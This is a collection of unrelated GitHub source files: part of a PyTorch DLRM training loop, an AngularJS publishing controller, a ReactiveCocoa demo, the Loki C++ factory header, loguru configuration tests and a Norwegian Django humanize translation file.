be done in parallel_forward ld_model = torch.load(args.load_model) else: # NOTE: when targeting inference on single GPU, # note that the call to .to(device) has already happened ld_model = torch.load( args.load_model, map_location=torch.device('cuda') # map_location=lambda storage, loc: storage.cuda(0) ) else: # when targeting inference on CPU ld_model = torch.load(args.load_model, map_location=torch.device('cpu')) dlrm.load_state_dict(ld_model["state_dict"]) ld_j = ld_model["iter"] ld_k = ld_model["epoch"] ld_nepochs = ld_model["nepochs"] ld_nbatches = ld_model["nbatches"] ld_nbatches_test = ld_model["nbatches_test"] ld_gA = ld_model["train_acc"] ld_gL = ld_model["train_loss"] ld_total_loss = ld_model["total_loss"] ld_total_accu = ld_model["total_accu"] ld_gA_test = ld_model["test_acc"] ld_gL_test = ld_model["test_loss"] if not args.inference_only: optimizer.load_state_dict(ld_model["opt_state_dict"]) best_gA_test = ld_gA_test total_loss = ld_total_loss total_accu = ld_total_accu skip_upto_epoch = ld_k # epochs skip_upto_batch = ld_j # batches else: args.print_freq = ld_nbatches args.test_freq = 0 print( "Saved at: epoch = {:d}/{:d}, batch = {:d}/{:d}, ntbatch = {:d}".format( ld_k, ld_nepochs, ld_j, ld_nbatches, ld_nbatches_test ) ) print( "Training state: loss = {:.6f}, accuracy = {:3.3f} %".format( ld_gL, ld_gA * 100 ) ) print( "Testing state: loss = {:.6f}, accuracy = {:3.3f} %".format( ld_gL_test, ld_gA_test * 100 ) ) print("time/loss/accuracy (if enabled):") with torch.autograd.profiler.profile(args.enable_profiling, use_gpu) as prof: while k < args.nepochs: if k < skip_upto_epoch: continue accum_time_begin = time_wrap(use_gpu) if args.mlperf_logging: previous_iteration_time = None for j, (X, lS_o, lS_i, T) in enumerate(train_ld): if j == 0 and args.save_onnx: (X_onnx, lS_o_onnx, lS_i_onnx) = (X, lS_o, lS_i) if j < skip_upto_batch: continue if args.mlperf_logging: current_time = time_wrap(use_gpu) if previous_iteration_time: iteration_time = current_time - previous_iteration_time else: iteration_time = 0 previous_iteration_time = current_time else: t1 = time_wrap(use_gpu) # early exit if nbatches was set by the user and has been exceeded if nbatches > 0 and j >= nbatches: break ''' # debug prints print("input and targets") print(X.detach().cpu().numpy()) print([np.diff(S_o.detach().cpu().tolist() + list(lS_i[i].shape)).tolist() for i, S_o in enumerate(lS_o)]) print([S_i.detach().cpu().numpy().tolist() for S_i in lS_i]) print(T.detach().cpu().numpy()) ''' # forward pass Z = dlrm_wrap(X, lS_o, lS_i, use_gpu, device) # loss E = loss_fn_wrap(Z, T, use_gpu, device) ''' # debug prints print("output and loss") print(Z.detach().cpu().numpy()) print(E.detach().cpu().numpy()) ''' # compute loss and accuracy L = E.detach().cpu().numpy() # numpy array S = Z.detach().cpu().numpy() # numpy array T = T.detach().cpu().numpy() # numpy array mbs = T.shape[0] # = args.mini_batch_size except maybe for last A = np.sum((np.round(S, 0) == T).astype(np.uint8)) if not args.inference_only: # scaled error gradient propagation # (where we do not accumulate gradients across mini-batches) optimizer.zero_grad() # backward pass E.backward() # debug prints (check gradient norm) # for l in mlp.layers: # if hasattr(l, 'weight'): # print(l.weight.grad.norm().item()) # optimizer optimizer.step() lr_scheduler.step() if args.mlperf_logging: total_time += iteration_time else: t2 = time_wrap(use_gpu) total_time += t2 - t1 total_accu += A total_loss += L * mbs total_iter += 1 total_samp += mbs should_print = ((j + 1) % args.print_freq == 0) or (j + 1 == nbatches) should_test = ( (args.test_freq > 0) and (args.data_generation == "dataset") and (((j + 1) % args.test_freq == 0) or (j + 1 == nbatches)) ) # print time, loss and accuracy if should_print or should_test: gT = 1000.0 * total_time / total_iter if args.print_time else -1 total_time = 0 gA = total_accu / total_samp total_accu = 0 gL = total_loss / total_samp total_loss = 0 str_run_type = "inference" if args.inference_only else "training" print( "Finished {} it {}/{} of epoch {}, {:.2f} ms/it, ".format( str_run_type, j + 1, nbatches, k, gT ) + "loss {:.6f}, accuracy {:3.3f} %".format(gL, gA * 100) ) # Uncomment the line below to print out the total time with overhead # print("Accumulated time so far: {}" \ # .format(time_wrap(use_gpu) - accum_time_begin)) total_iter = 0 total_samp = 0 # testing if should_test and not args.inference_only: # don't measure training iter time in a test iteration if args.mlperf_logging: previous_iteration_time = None test_accu = 0 test_loss = 0 test_samp = 0 accum_test_time_begin = time_wrap(use_gpu) if args.mlperf_logging: scores = [] targets = [] for i, (X_test, lS_o_test, lS_i_test, T_test) in enumerate(test_ld): # early exit if nbatches was set by the user and was exceeded if nbatches > 0 and i >= nbatches: break t1_test = time_wrap(use_gpu) # forward pass Z_test = dlrm_wrap( X_test, lS_o_test, lS_i_test, use_gpu, device ) if args.mlperf_logging: S_test = Z_test.detach().cpu().numpy() # numpy array T_test = T_test.detach().cpu().numpy() # numpy array scores.append(S_test) targets.append(T_test) else: # loss E_test = loss_fn_wrap(Z_test, T_test, use_gpu, device) # compute loss and accuracy L_test = E_test.detach().cpu().numpy() # numpy array S_test = Z_test.detach().cpu().numpy() # numpy array T_test = T_test.detach().cpu().numpy() # numpy array mbs_test = T_test.shape[0] # = mini_batch_size except last A_test = np.sum((np.round(S_test, 0) == T_test).astype(np.uint8)) test_accu += A_test test_loss += L_test * mbs_test test_samp += mbs_test t2_test = time_wrap(use_gpu) if args.mlperf_logging: scores = np.concatenate(scores, axis=0) targets = np.concatenate(targets, axis=0) metrics = { 'loss' : sklearn.metrics.log_loss, 'recall' : lambda y_true, y_score: sklearn.metrics.recall_score( y_true=y_true, y_pred=np.round(y_score) ), 'precision' : lambda y_true, y_score: sklearn.metrics.precision_score( y_true=y_true, y_pred=np.round(y_score) ), 'f1' : lambda y_true, y_score: sklearn.metrics.f1_score( y_true=y_true, y_pred=np.round(y_score) ), 'ap' : sklearn.metrics.average_precision_score, 'roc_auc' : sklearn.metrics.roc_auc_score, 'accuracy' : lambda y_true, y_score: sklearn.metrics.accuracy_score( y_true=y_true, y_pred=np.round(y_score) ), # 'pre_curve' : sklearn.metrics.precision_recall_curve, # 'roc_curve' : sklearn.metrics.roc_curve, } # print("Compute time for validation metric : ", end="") # first_it = True validation_results = {} for metric_name, metric_function in metrics.items(): # if first_it: # first_it = False # else: # print(", ", end="") # metric_compute_start = time_wrap(False) validation_results[metric_name] = metric_function( targets, scores ) # metric_compute_end = time_wrap(False) # met_time = metric_compute_end - metric_compute_start # print("{} {:.4f}".format(metric_name, 1000 * (met_time)), # end="") # print(" ms") gA_test = validation_results['accuracy'] gL_test = validation_results['loss'] else: gA_test = test_accu / test_samp gL_test = test_loss / test_samp is_best = gA_test > best_gA_test if is_best: best_gA_test = gA_test if not (args.save_model == ""): print("Saving model to {}".format(args.save_model)) torch.save( { "epoch": k, "nepochs": args.nepochs, "nbatches": nbatches, "nbatches_test": nbatches_test, "iter": j + 1, "state_dict": dlrm.state_dict(), "train_acc": gA, "train_loss": gL, "test_acc": gA_test, "test_loss": gL_test, "total_loss": total_loss, "total_accu": total_accu, "opt_state_dict": optimizer.state_dict(), }, args.save_model, ) if args.mlperf_logging: is_best = validation_results['roc_auc'] > best_auc_test if is_best: best_auc_test = validation_results['roc_auc'] print( "Testing at - {}/{} of epoch {},".format(j + 1, nbatches, k) + " loss {:.6f}, recall {:.4f}, precision {:.4f},".format( validation_results['loss'], validation_results['recall'], validation_results['precision'] ) + " f1 {:.4f}, ap {:.4f},".format( validation_results['f1'], validation_results['ap'], ) + " auc {:.4f}, best auc {:.4f},".format( validation_results['roc_auc'], best_auc_test ) + " accuracy {:3.3f} %, best accuracy {:3.3f} %".format( validation_results['accuracy'] * 100, best_gA_test * 100 ) ) else: print( "Testing at - {}/{} of epoch {},".format(j + 1, nbatches, 0) + " loss {:.6f}, accuracy {:3.3f} %, best {:3.3f} %".format( gL_test, gA_test * 100, best_gA_test * 100 ) ) # Uncomment the line below to print out the total time with overhead # print("Total test time for this group: {}" \ # .format(time_wrap(use_gpu) - accum_test_time_begin)) if (args.mlperf_logging and (args.mlperf_acc_threshold > 0) and (best_gA_test > args.mlperf_acc_threshold)): print("MLPerf testing accuracy threshold " + str(args.mlperf_acc_threshold) + " reached, stop training") break if (args.mlperf_logging and (args.mlperf_auc_threshold > 0) and (best_auc_test > args.mlperf_auc_threshold)): print("MLPerf testing auc threshold " + str(args.mlperf_auc_threshold) + " reached, stop training") break k += 1 # nepochs # profiling if args.enable_profiling: with open("dlrm_s_pytorch.prof", "w") as prof_f: prof_f.write(prof.key_averages().table(sort_by="cpu_time_total")) prof.export_chrome_trace("./dlrm_s_pytorch.json") # print(prof.key_averages().table(sort_by="cpu_time_total")) # plot compute graph if args.plot_compute_graph: sys.exit( "ERROR: Please install pytorchviz package in order to use the" + " visualization. Then, uncomment its import above as well as" + " three lines below and run the code again." ) # V = Z.mean() if args.inference_only else E # dot = make_dot(V, params=dict(dlrm.named_parameters())) # dot.render('dlrm_s_pytorch_graph') # write .pdf file # test prints if not args.inference_only and args.debug_mode: print("updated parameters (weights and bias):") for param in dlrm.parameters(): print(param.detach().cpu().numpy()) # export the model in onnx if args.save_onnx: dlrm_pytorch_onnx_file = "dlrm_s_pytorch.onnx" batch_size = X_onnx.shape[0] # debug prints # print("batch_size", batch_size) # print("inputs", X_onnx, lS_o_onnx, lS_i_onnx) # print("output", dlrm_wrap(X_onnx, lS_o_onnx, lS_i_onnx, use_gpu, device)) # force list conversion # if torch.is_tensor(lS_o_onnx): # lS_o_onnx = [lS_o_onnx[j] for j in range(len(lS_o_onnx))] # if torch.is_tensor(lS_i_onnx): # lS_i_onnx = [lS_i_onnx[j] for j in range(len(lS_i_onnx))] # force tensor conversion # if isinstance(lS_o_onnx, list): # lS_o_onnx = torch.stack(lS_o_onnx) # if isinstance(lS_i_onnx, list): # lS_i_onnx = torch.stack(lS_i_onnx) # debug prints print("X_onnx.shape", X_onnx.shape) if torch.is_tensor(lS_o_onnx): print("lS_o_onnx.shape", lS_o_onnx.shape) else: for oo in lS_o_onnx: print("oo.shape", oo.shape) if torch.is_tensor(lS_i_onnx): print("lS_i_onnx.shape", lS_i_onnx.shape) else: for ii in lS_i_onnx: print("ii.shape", ii.shape) # name inputs and outputs o_inputs = ["offsets"] if torch.is_tensor(lS_o_onnx) else ["offsets_"+str(i) for i in range(len(lS_o_onnx))] i_inputs = ["indices"] if torch.is_tensor(lS_i_onnx) else ["indices_"+str(i) for i in range(len(lS_i_onnx))] all_inputs = ["dense_x"] + o_inputs + i_inputs #debug prints print("inputs", all_inputs) # create dynamic_axis dictionaries do_inputs = [{'offsets': {1 : 'batch_size' }}] if torch.is_tensor(lS_o_onnx) else [{"offsets_"+str(i) :{0 : 'batch _size'}} for i in range(len(lS_o_onnx))] di_inputs = [{'indices': {1 : 'batch_size' }}] if torch.is_tensor(lS_i_onnx) else [{"indices_"+str(i) :{0 : 'batch _size'}} for i in range(len(lS_i_onnx))] dynamic_axes = {'dense_x' : {0 : 'batch _size'}, 'pred' : {0 : 'batch_size'}} for do in do_inputs: dynamic_axes.update(do) for di in di_inputs: dynamic_axes.update(di) # debug prints print(dynamic_axes) # export model torch.onnx.export( dlrm, (X_onnx, lS_o_onnx, lS_i_onnx), dlrm_pytorch_onnx_file, verbose=True, use_external_data_format=True, opset_version=11, input_names=all_inputs, output_names=["pred"], dynamic_axes=dynamic_axes ) # recover the model back dlrm_pytorch_onnx = onnx.load(dlrm_pytorch_onnx_file) # check the onnx model onnx.checker.check_model(dlrm_pytorch_onnx) ''' # run model using onnxruntime import onnxruntime as rt dict_inputs = {} dict_inputs["dense_x"] = X_onnx.numpy().astype(np.float32) if torch.is_tensor(lS_o_onnx): dict_inputs["offsets"] = lS_o_onnx.numpy().astype(np.int64) else: for i in range(len(lS_o_onnx)): dict_inputs["offsets_"+str(i)] = lS_o_onnx[i].numpy().astype(np.int64) if torch.is_tensor(lS_i_onnx): dict_inputs["indices"] = lS_i_onnx.numpy().astype(np.int64) else: for i in range(len(lS_i_onnx)): dict_inputs["indices_"+str(i)] = lS_i_onnx[i].numpy().astype(np.int64) print("dict_inputs", dict_inputs) sess = rt.InferenceSession(dlrm_pytorch_onnx_file, rt.SessionOptions()) prediction = sess.run(output_names=["pred"], input_feed=dict_inputs) print("prediction", prediction) '''
{ "pile_set_name": "Github" }
import tpl from './index.html'; import _ from 'lodash'; import { Set, Map } from 'immutable'; class ProjectPublishingController { constructor( $rootScope, $q, $log, $window, $state, $timeout, projectService, analysisService, tokenService, authService, paginationService ) { 'ngInject'; $rootScope.autoInject(this, arguments); } $onInit() { this.selectedLayers = new Set(); this.layersToAnalyses = new Map(); this.layerUrls = []; this.tileUrl = this.projectService.getProjectTileURL(this.project); this.showAnalyses = true; let sharePolicies = [ { label: 'Private', description: `Only you and those you create tokens for will be able to view tiles for this project`, enum: 'PRIVATE', active: false, enabled: true, token: true }, { label: 'Organization', description: `Users in your organization will be able to use their own tokens to view tiles for this project`, enum: 'ORGANIZATION', active: false, enabled: false, token: true }, { label: 'Public', description: 'Anyone can view tiles for this project without a token', enum: 'PUBLIC', active: false, enabled: true, token: false } ]; if (!this.templateTitle) { this.project = this.project; this.sharePolicies = sharePolicies.map(policy => { let isActive = policy.enum === this.project.tileVisibility; policy.active = isActive; return policy; }); this.activePolicy = this.sharePolicies.find(policy => policy.active); this.updateShareUrl(); } this.tileLayerUrls = { standard: null, arcGIS: null }; if (_.get(this, 'activePolicy.enum') === 'PRIVATE') { this.updateMapToken(); } this.fetchPage(); } fetchPage(page = this.$state.params.page || 1) { this.layerList = []; this.layerActions = {}; const currentQuery = this.projectService .getProjectLayers(this.project.id, { pageSize: 30, page: page - 1 }) .then( paginatedResponse => { this.layerList = paginatedResponse.results; this.layerList.forEach(layer => { layer.loadingAnalyses = true; this.analysisService .fetchAnalyses({ projectId: this.project.id, projectLayerId: layer.id, pageSize: 0, page: 0 }) .then(paginatedAnalyses => { layer.loadingAnalyses = false; layer.analysisCount = paginatedAnalyses.count; }) .catch(e => { this.$log.error(e); layer.loadingAnalyses = false; }); }); const defaultLayer = this.layerList.find( l => l.id === this.project.defaultLayerId ); this.layerActions = []; this.pagination = this.paginationService.buildPagination(paginatedResponse); this.paginationService.updatePageParam(page); if (this.currentQuery === currentQuery) { delete this.fetchError; } }, e => { if (this.currentQuery === currentQuery) { this.fetchError = e; } } ) .finally(() => { if (this.currentQuery === currentQuery) { delete this.currentQuery; } }); this.currentQuery = currentQuery; return currentQuery; } toggleShowAnalyses() { this.showAnalyses = !this.showAnalyses; } onSelect(layer) { const without = this.selectedLayers.filter(i => i.id !== layer.id); if (without.size !== this.selectedLayers.size) { this.selectedLayers = without; } else { this.selectedLayers = this.selectedLayers.add(layer); } } updateAnalysesMap() { if (!this.showAnalyses) { return this.$q.reject(); } const selectedLayerIds = Set(this.selectedLayers.map(sl => sl.id)); const cachedLayerIds = Set(this.layersToAnalyses.keySeq().map(l => l.id)); const layerAnalysesToFetch = selectedLayerIds.subtract(cachedLayerIds); return this.$q.all(layerAnalysesToFetch.map(this.fetchLayerAnalyses.bind(this))); } updateMapToken() { return this.tokenService.getOrCreateProjectMapToken(this.project).then(t => { this.mapToken = t; return t; }); } isSelected(layer) { return this.selectedLayers.has(layer); } updateShareUrl() { this.projectService.getProjectShareURL(this.project, this.mapToken).then(url => { this.shareUrl = url; }); } onPolicyChange(policy, $event) { if (!this.updatingPolicy && this.activePolicy !== policy) { // TODO: Show spinner and disable checkboxes while updating this.updatingPolicy = true; if (this.project.owner.id) { this.project.owner = this.project.owner.id; } this.projectService .updateProject( Object.assign({}, this.project, { tileVisibility: policy.enum, visibility: policy.enum }) ) .then(() => { if (this.activePolicy) { this.activePolicy.active = false; } policy.active = true; this.activePolicy = policy; this.project.tileVisibility = policy.enum; this.project.visibility = policy.enum; if (_.get(this, 'activePolicy.enum') === 'PRIVATE') { this.updateMapToken().then(() => this.updateShareUrl()); } else { this.updateShareUrl(); } }) .catch(e => { this.$log.error('Error while updating project share policy', e); this.policyError = e; }) .finally(() => { this.updatingPolicy = false; }); } } onCopyClick(e, url, type) { if (url && url.length) { this.copyType = type; this.$timeout(() => { delete this.copyType; }, 1000); } } } const component = { bindings: { project: '<', tileUrl: '<', templateTitle: '<' }, templateUrl: tpl, controller: ProjectPublishingController.name }; export default angular .module('components.pages.projects.settings.publishing', []) .controller(ProjectPublishingController.name, ProjectPublishingController) .component('rfProjectPublishingPage', component).name;
{ "pile_set_name": "Github" }
// // ViewController.m // RACCommand // // Created by Mr.Wang on 16/4/18. // Copyright © 2016年 Mr.wang. All rights reserved. // #import "ViewController.h" #import "ReactiveCocoa.h" // RACCommand:RAC中用于处理事件的类,可以把事件如何处理,事件中的数据如何传递,包装到这个类中,他可以很方便的监控事件的执行过程,比如看事件有没有执行完毕 // 使用场景:监听按钮点击,网络请求 @interface ViewController () @end @implementation ViewController - (void)viewDidLoad { [super viewDidLoad]; // Do any additional setup after loading the view, typically from a nib. [self test5]; } // 普通做法 - (void)test1 { // RACCommand: 处理事件 // 不能返回空的信号 // 1.创建命令 RACCommand *command = [[RACCommand alloc] initWithSignalBlock:^RACSignal *(id input) { //block调用,执行命令的时候就会调用 NSLog(@"%@",input); // input 为执行命令传进来的参数 // 这里的返回值不允许为nil return [RACSignal createSignal:^RACDisposable *(id<RACSubscriber> subscriber) { [subscriber sendNext:@"执行命令产生的数据"]; return nil; }]; }]; // 如何拿到执行命令中产生的数据呢? // 订阅命令内部的信号 // ** 方式一:直接订阅执行命令返回的信号 // 2.执行命令 RACSignal *signal =[command execute:@2]; // 这里其实用到的是replaySubject 可以先发送命令再订阅 // 在这里就可以订阅信号了 [signal subscribeNext:^(id x) { NSLog(@"%@",x); }]; } // 一般做法 - (void)test2 { // 1.创建命令 RACCommand *command = [[RACCommand alloc] initWithSignalBlock:^RACSignal *(id input) { //block调用,执行命令的时候就会调用 NSLog(@"%@",input); // input 为执行命令传进来的参数 // 这里的返回值不允许为nil return [RACSignal createSignal:^RACDisposable *(id<RACSubscriber> subscriber) { [subscriber sendNext:@"执行命令产生的数据"]; return nil; }]; }]; // 方式二: // 订阅信号 // 注意:这里必须是先订阅才能发送命令 // executionSignals:信号源,信号中信号,signalofsignals:信号,发送数据就是信号 [command.executionSignals subscribeNext:^(RACSignal *x) { [x subscribeNext:^(id x) { NSLog(@"%@", x); }]; // NSLog(@"%@", x); }]; // 2.执行命令 [command execute:@2]; } // 高级做法 - (void)test3 { // 1.创建命令 RACCommand *command = [[RACCommand alloc] initWithSignalBlock:^RACSignal *(id input) { // block调用:执行命令的时候就会调用 NSLog(@"%@", input); // 这里的返回值不允许为nil return [RACSignal createSignal:^RACDisposable *(id<RACSubscriber> subscriber) { [subscriber sendNext:@"发送信号"]; return nil; }]; }]; // 方式三 // switchToLatest获取最新发送的信号,只能用于信号中信号。 [command.executionSignals.switchToLatest subscribeNext:^(id x) { NSLog(@"%@", x); }]; // 2.执行命令 [command execute:@3]; } // switchToLatest - (void)test4 { // 创建信号中信号 RACSubject *signalofsignals = [RACSubject subject]; RACSubject *signalA = [RACSubject subject]; // 订阅信号 // [signalofsignals subscribeNext:^(RACSignal *x) { // [x subscribeNext:^(id x) { // NSLog(@"%@", x); // }]; // }]; // switchToLatest: 获取信号中信号发送的最新信号 [signalofsignals.switchToLatest subscribeNext:^(id x) { NSLog(@"%@", x); }]; // 发送信号 [signalofsignals sendNext:signalA]; [signalA sendNext:@4]; } // 监听事件有没有完成 - (void)test5 { //注意:当前命令内部发送数据完成,一定要主动发送完成 // 1.创建命令 RACCommand *command = [[RACCommand alloc] initWithSignalBlock:^RACSignal *(id input) { // block调用:执行命令的时候就会调用 NSLog(@"%@", input); // 这里的返回值不允许为nil return [RACSignal createSignal:^RACDisposable *(id<RACSubscriber> subscriber) { // 发送数据 [subscriber sendNext:@"执行命令产生的数据"]; // *** 发送完成 ** [subscriber sendCompleted]; return nil; }]; }]; // 监听事件有没有完成 [command.executing subscribeNext:^(id x) { if ([x boolValue] == YES) { // 正在执行 NSLog(@"当前正在执行%@", x); }else { // 执行完成/没有执行 NSLog(@"执行完成/没有执行"); } }]; // 2.执行命令 [command execute:@1]; } - (void)didReceiveMemoryWarning { [super didReceiveMemoryWarning]; // Dispose of any resources that can be recreated. } @end
{ "pile_set_name": "Github" }
//////////////////////////////////////////////////////////////////////////////// // The Loki Library // Copyright (c) 2001 by Andrei Alexandrescu // This code accompanies the book: // Alexandrescu, Andrei. "Modern C++ Design: Generic Programming and Design // Patterns Applied". Copyright (c) 2001. Addison-Wesley. // Permission to use, copy, modify, distribute and sell this software for any // purpose is hereby granted without fee, provided that the above copyright // notice appear in all copies and that both that copyright notice and this // permission notice appear in supporting documentation. // The author or Addison-Wesley Longman make no representations about the // suitability of this software for any purpose. It is provided "as is" // without express or implied warranty. //////////////////////////////////////////////////////////////////////////////// #ifndef FACTORY_INC_ #define FACTORY_INC_ #include "LokiTypeInfo.h" #include "AssocVector.h" #include <exception> namespace Loki { //////////////////////////////////////////////////////////////////////////////// // class template DefaultFactoryError // Manages the "Unknown Type" error in an object factory //////////////////////////////////////////////////////////////////////////////// template <typename IdentifierType, class AbstractProduct> struct DefaultFactoryError { struct Exception : public std::exception { const char* what() const throw() { return "Unknown Type"; } }; static AbstractProduct* OnUnknownType(IdentifierType) { throw Exception(); } }; //////////////////////////////////////////////////////////////////////////////// // class template Factory // Implements a generic object factory //////////////////////////////////////////////////////////////////////////////// template < class AbstractProduct, typename IdentifierType, typename ProductCreator = AbstractProduct* (*)(), template<typename, class> class FactoryErrorPolicy = DefaultFactoryError > class Factory : public FactoryErrorPolicy<IdentifierType, AbstractProduct> { public: bool Register(const IdentifierType& id, ProductCreator creator) { return associations_.insert( typename IdToProductMap::value_type(id, creator)).second; } bool Unregister(const IdentifierType& id) { return associations_.erase(id) == 1; } AbstractProduct* CreateObject(const IdentifierType& id) { typename IdToProductMap::iterator i = associations_.find(id); if (i != associations_.end()) { return (i->second)(); } return this->OnUnknownType(id); } private: typedef AssocVector<IdentifierType, ProductCreator> IdToProductMap; IdToProductMap associations_; }; //////////////////////////////////////////////////////////////////////////////// // class template CloneFactory // Implements a generic cloning factory //////////////////////////////////////////////////////////////////////////////// template < class AbstractProduct, class ProductCreator = AbstractProduct* (*)(const AbstractProduct*), template<typename, class> class FactoryErrorPolicy = DefaultFactoryError > class CloneFactory : public FactoryErrorPolicy<TypeInfo, AbstractProduct> { public: bool Register(const TypeInfo& ti, ProductCreator creator) { return associations_.insert( typename IdToProductMap::value_type(ti, creator)).second; } bool Unregister(const TypeInfo& id) { return associations_.erase(id) == 1; } AbstractProduct* CreateObject(const AbstractProduct* model) { if (model == 0) return 0; typename IdToProductMap::iterator i = associations_.find(typeid(*model)); if (i != associations_.end()) { return (i->second)(model); } return this->OnUnknownType(typeid(*model)); } private: typedef AssocVector<TypeInfo, ProductCreator> IdToProductMap; IdToProductMap associations_; }; } // namespace Loki //////////////////////////////////////////////////////////////////////////////// // Change log: // June 20, 2001: ported by Nick Thurn to gcc 2.95.3. Kudos, Nick!!! // May 08, 2002: replaced const_iterator with iterator so that self-modifying // ProductCreators are supported. Also, added a throw() // spec to what(). Credit due to Jason Fischl. // February 2, 2003: fixed dependent names - credit due to Rani Sharoni // March 4, 2003: fixed dependent names - credit due to Ruslan Zasukhin and CW 8.3 //////////////////////////////////////////////////////////////////////////////// #endif // FACTORY_INC_
{ "pile_set_name": "Github" }
import sys import pytest from loguru import logger def test_handlers(capsys, tmpdir): file = tmpdir.join("test.log") handlers = [ {"sink": str(file), "format": "FileSink: {message}"}, {"sink": sys.stdout, "format": "StdoutSink: {message}"}, ] logger.configure(handlers=handlers) logger.debug("test") out, err = capsys.readouterr() assert file.read() == "FileSink: test\n" assert out == "StdoutSink: test\n" assert err == "" def test_levels(writer): levels = [{"name": "my_level", "icon": "X", "no": 12}, {"name": "DEBUG", "icon": "!"}] logger.add(writer, format="{level.no}|{level.name}|{level.icon}|{message}") logger.configure(levels=levels) logger.log("my_level", "test") logger.debug("no bug") assert writer.read() == ("12|my_level|X|test\n" "10|DEBUG|!|no bug\n") def test_extra(writer): extra = {"a": 1, "b": 9} logger.add(writer, format="{extra[a]} {extra[b]}") logger.configure(extra=extra) logger.debug("") assert writer.read() == "1 9\n" def test_patcher(writer): logger.add(writer, format="{extra[a]} {extra[b]}") logger.configure(patcher=lambda record: record["extra"].update(a=1, b=2)) logger.debug("") assert writer.read() == "1 2\n" def test_activation(writer): activation = [("tests", False), ("tests.test_configure", True)] logger.add(writer, format="{message}") logger.configure(activation=activation) logger.debug("Logging") assert writer.read() == "Logging\n" def test_dict_unpacking(writer): config = { "handlers": [{"sink": writer, "format": "{level.no} - {extra[x]} {extra[z]} - {message}"}], "levels": [{"name": "test", "no": 30}], "extra": {"x": 1, "y": 2, "z": 3}, } logger.debug("NOPE") logger.configure(**config) logger.log("test", "Yes!") assert writer.read() == "30 - 1 3 - Yes!\n" def test_returned_ids(capsys): ids = logger.configure( handlers=[ {"sink": sys.stdout, "format": "{message}"}, {"sink": sys.stderr, "format": "{message}"}, ] ) assert len(ids) == 2 logger.debug("Test") out, err = capsys.readouterr() assert out == "Test\n" assert err == "Test\n" for i in ids: logger.remove(i) logger.debug("Nope") out, err = capsys.readouterr() assert out == "" assert err == "" def test_dont_reset_by_default(writer): logger.configure(extra={"a": 1}, patcher=lambda r: r["extra"].update(b=2)) logger.level("b", no=30) logger.add(writer, format="{level} {extra[a]} {extra[b]} {message}") logger.configure() logger.log("b", "Test") assert writer.read() == "b 1 2 Test\n" def test_reset_previous_handlers(writer): logger.add(writer, format="{message}") logger.configure(handlers=[]) logger.debug("Test") assert writer.read() == "" def test_reset_previous_extra(writer): logger.configure(extra={"a": 123}) logger.add(writer, format="{extra[a]}", catch=False) logger.configure(extra={}) with pytest.raises(KeyError): logger.debug("Nope") def test_reset_previous_patcher(writer): logger.configure(patcher=lambda r: r.update(a=123)) logger.add(writer, format="{extra[a]}", catch=False) logger.configure(patcher=lambda r: None) with pytest.raises(KeyError): logger.debug("Nope") def test_dont_reset_previous_levels(writer): logger.level("abc", no=30) logger.configure(levels=[]) logger.add(writer, format="{level} {message}") logger.log("abc", "Test") assert writer.read() == "abc Test\n" def test_configure_handler_using_new_level(writer): logger.configure( levels=[{"name": "CONF_LVL", "no": 33, "icon": "", "color": ""}], handlers=[ {"sink": writer, "level": "CONF_LVL", "format": "{level.name} {level.no} {message}"} ], ) logger.log("CONF_LVL", "Custom") assert writer.read() == "CONF_LVL 33 Custom\n" def test_configure_filter_using_new_level(writer): logger.configure( levels=[{"name": "CONF_LVL_2", "no": 33, "icon": "", "color": ""}], handlers=[ {"sink": writer, "level": 0, "filter": {"tests": "CONF_LVL_2"}, "format": "{message}"} ], ) logger.log("CONF_LVL_2", "Custom") assert writer.read() == "Custom\n" def test_configure_before_bind(writer): logger.configure(extra={"a": "default_a", "b": "default_b"}) logger.add(writer, format="{extra[a]} {extra[b]} {message}") logger.debug("init") logger_a = logger.bind(a="A") logger_b = logger.bind(b="B") logger_a.debug("aaa") logger_b.debug("bbb") assert writer.read() == ("default_a default_b init\n" "A default_b aaa\n" "default_a B bbb\n") def test_configure_after_bind(writer): logger_a = logger.bind(a="A") logger_b = logger.bind(b="B") logger.configure(extra={"a": "default_a", "b": "default_b"}) logger.add(writer, format="{extra[a]} {extra[b]} {message}") logger.debug("init") logger_a.debug("aaa") logger_b.debug("bbb") assert writer.read() == ("default_a default_b init\n" "A default_b aaa\n" "default_a B bbb\n")
{ "pile_set_name": "Github" }
# This file is distributed under the same license as the Django package. # msgid "" msgstr "" "Project-Id-Version: Django\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2011-03-15 13:18-0400\n" "PO-Revision-Date: 2011-03-04 18:39+0000\n" "Last-Translator: Jannis <jannis@leidel.info>\n" "Language-Team: Norwegian <>\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "Language: no\n" "Plural-Forms: nplurals=2; plural=(n != 1)\n" #: templatetags/humanize.py:19 msgid "th" msgstr "." #: templatetags/humanize.py:19 msgid "st" msgstr "." #: templatetags/humanize.py:19 msgid "nd" msgstr "." #: templatetags/humanize.py:19 msgid "rd" msgstr "." #: templatetags/humanize.py:54 #, python-format msgid "%(value).1f million" msgid_plural "%(value).1f million" msgstr[0] "%(value).1f million" msgstr[1] "%(value).1f millioner" #: templatetags/humanize.py:57 #, python-format msgid "%(value).1f billion" msgid_plural "%(value).1f billion" msgstr[0] "%(value).1f milliard" msgstr[1] "%(value).1f milliarder" #: templatetags/humanize.py:60 #, python-format msgid "%(value).1f trillion" msgid_plural "%(value).1f trillion" msgstr[0] "%(value).1f billion" msgstr[1] "%(value).1f billioner" #: templatetags/humanize.py:76 msgid "one" msgstr "én" #: templatetags/humanize.py:76 msgid "two" msgstr "to" #: templatetags/humanize.py:76 msgid "three" msgstr "tre" #: templatetags/humanize.py:76 msgid "four" msgstr "fire" #: templatetags/humanize.py:76 msgid "five" msgstr "fem" #: templatetags/humanize.py:76 msgid "six" msgstr "seks" #: templatetags/humanize.py:76 msgid "seven" msgstr "sju" #: templatetags/humanize.py:76 msgid "eight" msgstr "åtte" #: templatetags/humanize.py:76 msgid "nine" msgstr "ni" #: templatetags/humanize.py:96 msgid "today" msgstr "i dag" #: templatetags/humanize.py:98 msgid "tomorrow" msgstr "i morgen" #: templatetags/humanize.py:100 msgid "yesterday" msgstr "i går"
{ "pile_set_name": "Github" }
